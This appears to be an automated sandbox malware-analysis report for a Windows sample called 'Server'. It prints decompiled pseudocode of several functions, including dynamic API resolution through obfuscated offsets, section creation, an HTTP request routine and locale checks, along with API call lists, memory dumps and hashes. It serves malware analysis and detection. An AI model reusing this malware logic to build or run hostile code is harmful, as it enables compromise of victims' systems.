            				_Unknown_base(*)()* _t39;
            				_Unknown_base(*)()* _t42;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t50;
            				intOrPtr _t56;
            
            				_t56 = E004012E6(0x20);
            				if(_t56 == 0) {
            					_v8 = 8;
            				} else {
            					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
            					_v8 = 0x7f;
            					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
            					 *(_t56 + 0xc) = _t29;
            					if(_t29 == 0) {
            						L8:
            						E00401BA9(_t56);
            					} else {
            						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
            						 *(_t56 + 0x10) = _t33;
            						if(_t33 == 0) {
            							goto L8;
            						} else {
            							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
            							 *(_t56 + 0x14) = _t36;
            							if(_t36 == 0) {
            								goto L8;
            							} else {
            								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
            								 *(_t56 + 0x18) = _t39;
            								if(_t39 == 0) {
            									goto L8;
            								} else {
            									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
            									 *(_t56 + 0x1c) = _t42;
            									if(_t42 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t56 + 8)) = _a8;
            										 *((intOrPtr*)(_t56 + 4)) = _a4;
            										_t46 = E0040110B(_t56, _a12); // executed
            										_v8 = _t46;
            										if(_t46 != 0) {
            											goto L8;
            										} else {
            											 *_a16 = _t56;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}












            0x00401210
            0x00401214
            0x004012d5
            0x0040121a
            0x00401232
            0x00401241
            0x00401248
            0x0040124a
            0x0040124f
            0x004012cd
            0x004012ce
            0x00401251
            0x0040125e
            0x00401260
            0x00401265
            0x00000000
            0x00401267
            0x00401274
            0x00401276
            0x0040127b
            0x00000000
            0x0040127d
            0x0040128a
            0x0040128c
            0x00401291
            0x00000000
            0x00401293
            0x004012a0
            0x004012a2
            0x004012a7
            0x00000000
            0x004012a9
            0x004012af
            0x004012b5
            0x004012ba
            0x004012bf
            0x004012c4
            0x00000000
            0x004012c6
            0x004012c9
            0x004012c9
            0x004012c4
            0x004012a7
            0x00401291
            0x0040127b
            0x00401265
            0x0040124f
            0x004012e3

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020251D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
            				void* __esi;
            				long _t10;
            				void* _t18;
            				void* _t22;
            
            				_t9 = __eax;
            				_t22 = __eax;
            				if(_a4 != 0 && E02022058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
            					L9:
            					return GetLastError();
            				}
            				_t10 = E02027B83(_t9, _t18, _t22, _a8); // executed
            				if(_t10 == 0) {
            					ResetEvent( *(_t22 + 0x1c));
            					ResetEvent( *(_t22 + 0x20));
            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
            						SetEvent( *(_t22 + 0x1c));
            						goto L7;
            					} else {
            						_t10 = GetLastError();
            						if(_t10 == 0x3e5) {
            							L7:
            							_t10 = 0;
            						}
            					}
            				}
            				if(_t10 == 0xffffffff) {
            					goto L9;
            				}
            				return _t10;
            			}







            0x020251d8
            0x020251e5
            0x020251e7
            0x0202524a
            0x00000000
            0x0202524a
            0x020251ff
            0x02025206
            0x02025212
            0x02025217
            0x0202522d
            0x0202523d
            0x00000000
            0x0202522f
            0x0202522f
            0x02025236
            0x02025243
            0x02025243
            0x02025243
            0x02025236
            0x0202522d
            0x02025248
            0x00000000
            0x00000000
            0x0202524e

            APIs
            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,020221E7,?,?,746981D0,00000000), ref: 02025212
            • ResetEvent.KERNEL32(?), ref: 02025217
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02025224
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?,?), ref: 0202522F
            • GetLastError.KERNEL32(?,?,00000102,020221E7,?,?,746981D0,00000000), ref: 0202524A
              • Part of subcall function 02022058: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,020251F7,?,?,?,?,00000102,020221E7,?,?,746981D0), ref: 02022064
              • Part of subcall function 02022058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,020251F7,?,?,?,?,00000102,020221E7,?), ref: 020220C2
              • Part of subcall function 02022058: lstrcpy.KERNEL32(00000000,00000000), ref: 020220D2
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?), ref: 0202523D
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
            • String ID:
            • API String ID: 3739416942-0
            • Opcode ID: 7b27acdd099f91a648a2fe2294f1648862be17f15341e238ddfd664b1827f25a
            • Instruction ID: a9953bdde754ac4e226464e4304071ac3fcd6651613d373a0c3bad26c61e8b34
            • Opcode Fuzzy Hash: 7b27acdd099f91a648a2fe2294f1648862be17f15341e238ddfd664b1827f25a
            • Instruction Fuzzy Hash: C8016D31500324AED7726A61DC84F5BBBE9BF4A364FA10A27F595D10E0D720E81CEA29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E02025364(void** __esi) {
            				intOrPtr _v0;
            				intOrPtr _t4;
            				intOrPtr _t6;
            				void* _t8;
            				void* _t9;
            				intOrPtr _t10;
            				void* _t11;
            				void** _t13;
            
            				_t13 = __esi;
            				_t4 =  *0x202a3cc; // 0x2ca9600
            				__imp__(_t4 + 0x40);
            				while(1) {
            					_t6 =  *0x202a3cc; // 0x2ca9600
            					_t1 = _t6 + 0x58; // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t8 =  *_t13;
            				if(_t8 != 0 && _t8 != 0x202a030) {
            					HeapFree( *0x202a2d8, 0, _t8);
            				}
            				_t9 = E020212C6(_v0, _t13); // executed
            				_t13[1] = _t9;
            				_t10 =  *0x202a3cc; // 0x2ca9600
            				_t11 = _t10 + 0x40;
            				__imp__(_t11);
            				return _t11;
            			}











            0x02025364
            0x02025364
            0x0202536d
            0x0202537d
            0x0202537d
            0x02025382
            0x02025387
            0x00000000
            0x00000000
            0x02025377
            0x02025377
            0x02025389
            0x0202538d
            0x0202539f
            0x0202539f
            0x020253aa
            0x020253af
            0x020253b2
            0x020253b7
            0x020253bb
            0x020253c1

            APIs
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 0202536D
            • Sleep.KERNEL32(0000000A), ref: 02025377
            • HeapFree.KERNEL32(00000000,00000000), ref: 0202539F
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 020253BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: beea59919c06e81462bb648efaa3edb81a13e87197f3a954dedf5005c0b35ec7
            • Instruction ID: 18ca46f3e47839b046a997cd29e8c517fd6bf5ba5296cd132c1dc457c7e1640b
            • Opcode Fuzzy Hash: beea59919c06e81462bb648efaa3edb81a13e87197f3a954dedf5005c0b35ec7
            • Instruction Fuzzy Hash: 3DF03A71B403159FEB349B68DEC8F0A7BE5BB04340B225803B545D6261CB24D86CEA18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E02022523(signed int __edx) {
            				signed int _v8;
            				long _v12;
            				CHAR* _v16;
            				long _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t21;
            				CHAR* _t22;
            				CHAR* _t25;
            				intOrPtr _t26;
            				void* _t27;
            				void* _t31;
            				intOrPtr _t32;
            				void* _t33;
            				CHAR* _t37;
            				CHAR* _t43;
            				CHAR* _t44;
            				CHAR* _t45;
            				void* _t50;
            				void* _t52;
            				signed char _t57;
            				intOrPtr _t59;
            				signed int _t60;
            				void* _t64;
            				CHAR* _t68;
            				CHAR* _t69;
            				char* _t70;
            				void* _t71;
            
            				_t62 = __edx;
            				_v20 = 0;
            				_v8 = 0;
            				_v12 = 0;
            				_t21 = E02024520();
            				if(_t21 != 0) {
            					_t60 =  *0x202a2fc; // 0x2000000a
            					_t56 = (_t60 & 0xf0000000) + _t21;
            					 *0x202a2fc = (_t60 & 0xf0000000) + _t21;
            				}
            				_t22 =  *0x202a178(0, 2); // executed
            				_v16 = _t22;
            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
            					_t25 = E02023037( &_v8,  &_v20); // executed
            					_t55 = _t25;
            					_t26 =  *0x202a348; // 0xc7d5a8
            					if( *0x202a2fc > 5) {
            						_t8 = _t26 + 0x202b51d; // 0x4d283a53
            						_t27 = _t8;
            					} else {
            						_t7 = _t26 + 0x202b9db; // 0x44283a44
            						_t27 = _t7;
            					}
            					E02024332(_t27, _t27);
            					_t31 = E0202415A(_t62,  &_v20,  &_v12); // executed
            					if(_t31 == 0) {
            						CloseHandle(_v20);
            					}
            					_t64 = 5;
            					if(_t55 != _t64) {
            						_t32 = E020227A0();
            						 *0x202a310 =  *0x202a310 ^ 0x81bbe65d;
            						 *0x202a36c = _t32;
            						_t33 = E020233DC(0x60);
            						 *0x202a3cc = _t33;
            						__eflags = _t33;
            						if(_t33 == 0) {
            							_push(8);
            							_pop(0);
            						} else {
            							memset(_t33, 0, 0x60);
            							_t50 =  *0x202a3cc; // 0x2ca9600
            							_t71 = _t71 + 0xc;
            							__imp__(_t50 + 0x40);
            							_t52 =  *0x202a3cc; // 0x2ca9600
            							 *_t52 = 0x202b142;
            						}
            						_t55 = 0;
            						__eflags = 0;
            						if(0 == 0) {
            							_t37 = RtlAllocateHeap( *0x202a2d8, 0, 0x43);
            							 *0x202a368 = _t37;
            							__eflags = _t37;
            							if(_t37 == 0) {
            								_push(8);
            								_pop(0);
            							} else {
            								_t57 =  *0x202a2fc; // 0x2000000a
            								_t62 = _t57 & 0x000000ff;
            								_t59 =  *0x202a348; // 0xc7d5a8
            								_t13 = _t59 + 0x202b74a; // 0x697a6f4d
            								_t56 = _t13;
            								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x202927b);
            							}
            							_t55 = 0;
            							__eflags = 0;
            							if(0 == 0) {
            								asm("sbb eax, eax");
            								E02023BD3( ~_v8 &  *0x202a310, 0x202a00c); // executed
            								_t43 = E02021D8A(0, _t56, _t62, _t64, 0x202a00c); // executed
            								_t55 = _t43;
            								__eflags = _t55;
            								if(_t55 != 0) {
            									goto L30;
            								}
            								_t44 = E02026EA3(_t62); // executed
            								__eflags = _t44;
            								if(_t44 != 0) {
            									__eflags = _v8;
            									_t68 = _v12;
            									if(_v8 != 0) {
            										L29:
            										_t45 = E02026815(_t62, _t68, _v8); // executed
            										_t55 = _t45;
            										goto L30;
            									}
            									__eflags = _t68;
            									if(__eflags == 0) {
            										goto L30;
            									}
            									_t55 = E02025C31(__eflags,  &(_t68[4]));
            									__eflags = _t55;
            									if(_t55 == 0) {
            										goto L30;
            									}
            									goto L29;
            								}
            								_t55 = 8;
            							}
            						}
            					} else {
            						_t69 = _v12;
            						if(_t69 == 0) {
            							L30:
            							if(_v16 == 0 || _v16 == 1) {
            								 *0x202a17c();
            							}
            							goto L34;
            						}
            						_t70 =  &(_t69[4]);
            						do {
            						} while (E020223C4(_t64, _t70, 0, 1) == 0x4c7);
            					}
            					goto L30;
            				} else {
            					_t55 = _t22;
            					L34:
            					return _t55;
            				}
            			}
































            0x02022523
            0x0202252d
            0x02022530
            0x02022533
            0x02022536
            0x0202253d
            0x0202253f
            0x0202254b
            0x0202254d
            0x0202254d
            0x02022556
            0x0202255c
            0x02022561
            0x0202257b
            0x02022587
            0x02022589
            0x0202258e
            0x02022598
            0x02022598
            0x02022590
            0x02022590
            0x02022590
            0x02022590
            0x0202259f
            0x020225ac
            0x020225b3
            0x020225b8
            0x020225b8
            0x020225c1
            0x020225c4
            0x020225ea
            0x020225ef
            0x020225fb
            0x02022600
            0x02022605
            0x0202260a
            0x0202260c
            0x02022638
            0x0202263a
            0x0202260e
            0x02022612
            0x02022617
            0x0202261c
            0x02022623
            0x02022629
            0x0202262e
            0x02022634
            0x0202263b
            0x0202263d
            0x0202263f
            0x0202264e
            0x02022654
            0x02022659
            0x0202265b
            0x0202268b
            0x0202268d
            0x0202265d
            0x0202265d
            0x02022663
            0x02022670
            0x02022676
            0x02022676
            0x0202267e
            0x02022687
            0x0202268e
            0x02022690
            0x02022692
            0x02022699
            0x020226a6
            0x020226ab
            0x020226b0
            0x020226b2
            0x020226b4
            0x00000000
            0x00000000
            0x020226b6
            0x020226bb
            0x020226bd
            0x020226c4
            0x020226c8
            0x020226cb
            0x020226e0
            0x020226e4
            0x020226e9
            0x00000000
            0x020226e9
            0x020226cd
            0x020226cf
            0x00000000
            0x00000000
            0x020226da
            0x020226dc
            0x020226de
            0x00000000
            0x00000000
            0x00000000
            0x020226de
            0x020226c1
            0x020226c1
            0x02022692
            0x020225c6
            0x020225c6
            0x020225cb
            0x020226eb
            0x020226f0
            0x020226f8
            0x020226f8
            0x00000000
            0x020226f0
            0x020225d1
            0x020225d4
            0x020225de
            0x020225e5
            0x00000000
            0x02022700
            0x02022700
            0x02022703
            0x02022707
            0x02022707

            APIs
              • Part of subcall function 02024520: GetModuleHandleA.KERNEL32(4C44544E,00000000,0202253B,00000001), ref: 0202452F
            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 020225B8
              • Part of subcall function 020227A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 020227C4
              • Part of subcall function 020227A0: wsprintfA.USER32 ref: 02022828
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • memset.NTDLL ref: 02022612
            • RtlInitializeCriticalSection.NTDLL(02CA95C0), ref: 02022623
              • Part of subcall function 02025C31: memset.NTDLL ref: 02025C4B
              • Part of subcall function 02025C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02025C91
              • Part of subcall function 02025C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02025C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0202264E
            • wsprintfA.USER32 ref: 0202267E
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: ba151e16b35da0d790abcb05cc7660a55768f8a3703b6f3b1a09748b38eb3b24
            • Instruction ID: f03db4c6c6a11b9a0bf3378c2c9032b8ceae5509b19abc7b78d5655c0d8173b3
            • Opcode Fuzzy Hash: ba151e16b35da0d790abcb05cc7660a55768f8a3703b6f3b1a09748b38eb3b24
            • Instruction Fuzzy Hash: 1251C371F40335AFDB219BE4DD98B9E73E8BB04714F214857E901E6140DB78995CAF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E02027040(signed int __eax, signed int _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				signed int _v20;
            				intOrPtr _t81;
            				char _t83;
            				signed int _t90;
            				signed int _t97;
            				signed int _t99;
            				char _t101;
            				unsigned int _t102;
            				intOrPtr _t103;
            				char* _t107;
            				signed int _t110;
            				signed int _t113;
            				signed int _t118;
            				signed int _t122;
            				intOrPtr _t124;
            
            				_t102 = _a8;
            				_t118 = 0;
            				_v20 = __eax;
            				_t122 = (_t102 >> 2) + 1;
            				_v8 = 0;
            				_a8 = 0;
            				_t81 = E020233DC(_t122 << 2);
            				_v16 = _t81;
            				if(_t81 == 0) {
            					_push(8);
            					_pop(0);
            					L37:
            					return 0;
            				}
            				_t107 = _a4;
            				_a4 = _t102;
            				_t113 = 0;
            				while(1) {
            					_t83 =  *_t107;
            					if(_t83 == 0) {
            						break;
            					}
            					if(_t83 == 0xd || _t83 == 0xa) {
            						if(_t118 != 0) {
            							if(_t118 > _v8) {
            								_v8 = _t118;
            							}
            							_a8 = _a8 + 1;
            							_t118 = 0;
            						}
            						 *_t107 = 0;
            						goto L16;
            					} else {
            						if(_t118 != 0) {
            							L10:
            							_t118 = _t118 + 1;
            							L16:
            							_t107 = _t107 + 1;
            							_t15 =  &_a4;
            							 *_t15 = _a4 - 1;
            							if( *_t15 != 0) {
            								continue;
            							}
            							break;
            						}
            						if(_t113 == _t122) {
            							L21:
            							if(_a8 <= 0x20) {
            								_push(0xb);
            								L34:
            								_pop(0);
            								L35:
            								E020261DA(_v16);
            								goto L37;
            							}
            							_t24 = _v8 + 5; // 0xcdd8d2f8
            							_t103 = E020233DC((_v8 + _t24) * _a8 + 4);
            							if(_t103 == 0) {
            								_push(8);
            								goto L34;
            							}
            							_t90 = _a8;
            							_a4 = _a4 & 0x00000000;
            							_v8 = _v8 & 0x00000000;
            							_t124 = _t103 + _t90 * 4;
            							if(_t90 <= 0) {
            								L31:
            								 *0x202a318 = _t103;
            								goto L35;
            							}
            							do {
            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
            								_v12 = _v12 & 0x00000000;
            								if(_a4 <= 0) {
            									goto L30;
            								} else {
            									goto L26;
            								}
            								while(1) {
            									L26:
            									_t99 = _v12;
            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
            									if(_t99 == 0) {
            										break;
            									}
            									_v12 = _v12 + 1;
            									if(_v12 < _a4) {
            										continue;
            									}
            									goto L30;
            								}
            								_v8 = _v8 - 1;
            								L30:
            								_t97 = _a4;
            								_a4 = _a4 + 1;
            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
            								__imp__(_t124);
            								_v8 = _v8 + 1;
            								_t124 = _t124 + _t97 + 1;
            							} while (_v8 < _a8);
            							goto L31;
            						}
            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
            						_t101 = _t83;
            						if(_t83 - 0x61 <= 0x19) {
            							_t101 = _t101 - 0x20;
            						}
            						 *_t107 = _t101;
            						_t113 = _t113 + 1;
            						goto L10;
            					}
            				}
            				if(_t118 != 0) {
            					if(_t118 > _v8) {
            						_v8 = _t118;
            					}
            					_a8 = _a8 + 1;
            				}
            				goto L21;
            			}





















            0x02027047
            0x0202704e
            0x02027053
            0x02027056
            0x0202705d
            0x02027060
            0x02027063
            0x02027068
            0x0202706d
            0x020271c1
            0x020271c3
            0x020271c5
            0x020271ca
            0x020271ca
            0x02027073
            0x02027076
            0x02027079
            0x0202707b
            0x0202707b
            0x0202707f
            0x00000000
            0x00000000
            0x02027083
            0x020270af
            0x020270b4
            0x020270b6
            0x020270b6
            0x020270b9
            0x020270bc
            0x020270bc
            0x020270be
            0x00000000
            0x02027089
            0x0202708b
            0x020270aa
            0x020270aa
            0x020270c1
            0x020270c1
            0x020270c2
            0x020270c2
            0x020270c5
            0x00000000
            0x00000000
            0x00000000
            0x020270c5
            0x0202708f
            0x020270d6
            0x020270da
            0x020271b4
            0x020271b6
            0x020271b6
            0x020271b7
            0x020271ba
            0x00000000
            0x020271ba
            0x020270e3
            0x020270f4
            0x020270f8
            0x020271b0
            0x00000000
            0x020271b0
            0x020270fe
            0x02027101
            0x02027105
            0x02027109
            0x0202710e
            0x020271a6
            0x020271a6
            0x00000000
            0x020271ac
            0x02027119
            0x02027122
            0x02027136
            0x0202713d
            0x02027152
            0x02027158
            0x02027160
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x02027162
            0x02027162
            0x02027162
            0x02027169
            0x02027171
            0x00000000
            0x00000000
            0x02027173
            0x0202717c
            0x00000000
            0x00000000
            0x00000000
            0x0202717e
            0x02027180
            0x02027183
            0x02027183
            0x02027186
            0x0202718a
            0x0202718d
            0x02027193
            0x02027196
            0x0202719d
            0x00000000
            0x02027119
            0x02027094
            0x0202709c
            0x020270a2
            0x020270a4
            0x020270a4
            0x020270a7
            0x020270a9
            0x00000000
            0x020270a9
            0x02027083
            0x020270c9
            0x020270ce
            0x020270d0
            0x020270d0
            0x020270d3
            0x020270d3
            0x00000000

            APIs
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • lstrcpy.KERNEL32(43175AC4,00000020), ref: 0202713D
            • lstrcat.KERNEL32(43175AC4,00000020), ref: 02027152
            • lstrcmp.KERNEL32(00000000,43175AC4), ref: 02027169
            • lstrlen.KERNEL32(43175AC4), ref: 0202718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
            • Opcode ID: 56407d537915a1f4412727cd1b4c6ae14a67b0cfcb3d698f2f64f5e47c86b8ac
            • Instruction ID: f89dda93a12015918ae91f2d8877db156ec0fda2710bb99a6c5f80018f49cd60
            • Opcode Fuzzy Hash: 56407d537915a1f4412727cd1b4c6ae14a67b0cfcb3d698f2f64f5e47c86b8ac
            • Instruction Fuzzy Hash: 2F51C171A00328EFDF22CF99C4846ADFBB6FF41318F15805BE8159B225C770AA19DB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t1;
            				int _t4;
            				int _t6;
            
            				_t6 = 0;
            				_t1 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x404160 = _t1;
            				if(_t1 != 0) {
            					 *0x404170 = GetModuleHandleA(0);
            					GetCommandLineW(); // executed
            					_t4 = E004019F1(); // executed
            					_t6 = _t4;
            					HeapDestroy( *0x404160);
            				}
            				ExitProcess(_t6);
            			}






            0x00401de2
            0x00401deb
            0x00401df1
            0x00401df8
            0x00401e01
            0x00401e06
            0x00401e0c
            0x00401e17
            0x00401e19
            0x00401e19
            0x00401e20

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FC024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction ID: 2c408c3de3c5f89346c917da98fc267cfbffc02862680788a93cd0bd46bbc1be
            • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction Fuzzy Hash: 24C1A9B5D00229EFDB60CFA8D984BADBBB5BF08304F108099E548A7251DB319A95DF15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
